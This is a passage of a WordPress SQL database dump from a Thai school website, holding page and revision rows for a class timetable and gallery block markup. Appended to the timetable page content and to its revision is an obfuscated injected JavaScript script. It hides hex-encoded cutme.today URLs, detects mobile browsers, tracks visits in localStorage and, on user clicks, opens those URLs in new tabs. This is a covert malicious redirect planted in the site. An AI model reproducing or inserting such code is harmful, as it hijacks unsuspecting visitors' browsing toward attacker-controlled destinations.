f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ตารางเรียน-ตารางสอน','','publish','closed','closed','','%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%aa%e0%b8%ad%e0%b8%99','','','2024-08-08 21:29:46','2024-08-08 14:29:46','',0,'http://pakhaeng.ssk.in.th/?page_id=748',0,'page','',0),
(749,1,'2024-08-08 21:20:39','2024-08-08 14:20:39','','ตารางเรียน-ตามรางสอน2567','','inherit','','closed','','%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%95%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%aa%e0%b8%ad%e0%b8%992567','','','2024-08-08 21:20:39','2024-08-08 14:20:39','',748,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ตารางเรียน-ตามรางสอน2567.pdf',0,'attachment','application/pdf',0),
(750,1,'2024-08-08 21:21:05','2024-08-08 14:21:05','<!-- wp:file {\"id\":749,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ตารางเรียน-ตามรางสอน2567.pdf\",\"displayPreview\":false} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-d6acabfc-c5f7-46bb-bd25-575269155843\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ตารางเรียน-ตามรางสอน2567.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">ตารางเรียน-ตามรางสอน2567</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ตารางเรียน-ตามรางสอน2567.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d6acabfc-c5f7-46bb-bd25-575269155843\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ตารางเรียน-ตารางสอน','','inherit','closed','closed','','748-revision-v1','','','2024-08-08 21:21:05','2024-08-08 14:21:05','',748,'http://pakhaeng.ssk.in.th/?p=750',0,'revision','',0),
(751,1,'2024-08-08 21:21:24','2024-08-08 14:21:24','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid 